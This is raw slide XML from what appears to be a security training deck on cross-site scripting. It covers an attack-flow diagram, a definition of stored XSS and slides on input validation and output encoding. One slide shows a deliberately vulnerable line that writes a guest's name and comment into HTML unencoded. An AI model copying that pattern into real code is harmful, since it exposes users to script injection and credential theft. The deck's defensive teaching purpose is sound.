          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="hlink"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="triangle" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 10"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1066800" y="5105400"/>
            <a:ext cx="6889750" cy="1066800"/>
            <a:chOff x="624" y="2976"/>
            <a:chExt cx="4340" cy="970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Rectangle 11"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="624" y="2976"/>
              <a:ext cx="4340" cy="970"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="D2D8C2">
                <a:alpha val="41000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="756" y="3031"/>
              <a:ext cx="4090" cy="858"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr>
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="35000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="hlink"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>XSS - Cross </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Site Scripting:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPct val="35000"/>
                </a:spcBef>
                <a:buClr>
                  <a:schemeClr val="hlink"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Inserting a malicious script that compromises the trust relationship between a user and a Web application, resulting in sending an attacker confidential information that can be used to steal that user’s identity.</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 13"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="3128963" y="3957641"/>
            <a:ext cx="2654300" cy="738188"/>
            <a:chOff x="1971" y="2493"/>
            <a:chExt cx="1672" cy="465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Text Box 14"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2007" y="2493"/>
              <a:ext cx="1636" cy="465"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Innocent user </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>clicks &lt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>but the web app </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>downloads </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>script and </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>executes&gt;</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 15"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1971" y="2591"/>
              <a:ext cx="174" cy="174"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1200" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 16"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="2978150" y="1803401"/>
            <a:ext cx="2819400" cy="738188"/>
            <a:chOff x="1876" y="1136"/>
            <a:chExt cx="1776" cy="465"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Text Box 17"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1952" y="1136"/>
              <a:ext cx="1700" cy="465"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Hacker posts</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> &lt;malicious script&gt; </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>through vulnerable </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Web application</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Oval 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1876" y="1254"/>
              <a:ext cx="174" cy="174"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1200" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 19"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2582864"/>
            <a:ext cx="1917700" cy="998538"/>
            <a:chOff x="0" y="1627"/>
            <a:chExt cx="1208" cy="629"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Oval 20"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="466" y="1627"/>
              <a:ext cx="174" cy="174"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700" algn="ctr">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1200" b="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Text Box 21"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="0" y="1791"/>
              <a:ext cx="1208" cy="465"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="12700">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Script captures credential info and sends to hacker</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="Picture 22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="2971800"/>
            <a:ext cx="1143000" cy="989013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Slide Number Placeholder 23"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Footer Placeholder 2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566527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9"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10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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>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1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Cross Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="990600"/>
            <a:ext cx="8458200" cy="5029200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Hostile data stored in files, database or any other backend system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a page will reflect above user supplied data invalidated to the user at a later stage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CMS, blogs, forums</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML page returns the user supplied data invalidated to another user:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>out.writeln</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;td&gt;" + guest.name + "&lt;td&gt;" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>guest.comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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2238660" y="4038600"/>
            <a:ext cx="4390740" cy="2343285"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{7A1601AE-3AB5-4580-9556-3C20AF0CA3B8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>17</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77943575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Preventing XSS</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Best protection is input validation using ‘white listing’ approach and output encoding</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Validation allows detection of attacks and encoding prevents any successful script injection from running at the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Constrain input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Server side validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Validate length, range, format and type. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Use “accept known good” validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reject invalid input rather than trying to sanitize it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Regular expression </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>validator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> – to constrain text input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Do not forget the error messages, they too might contain invalid data</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18</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5022305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Three Strategies for Data Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8229600" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Accept Known Good:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Strongly typed at all times</a:t>
            </a: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Length checked and fields length minimized</a:t>
            </a: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Range checked if a numeric</a:t>
            </a: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Unsigned unless required to be signed</a:t>
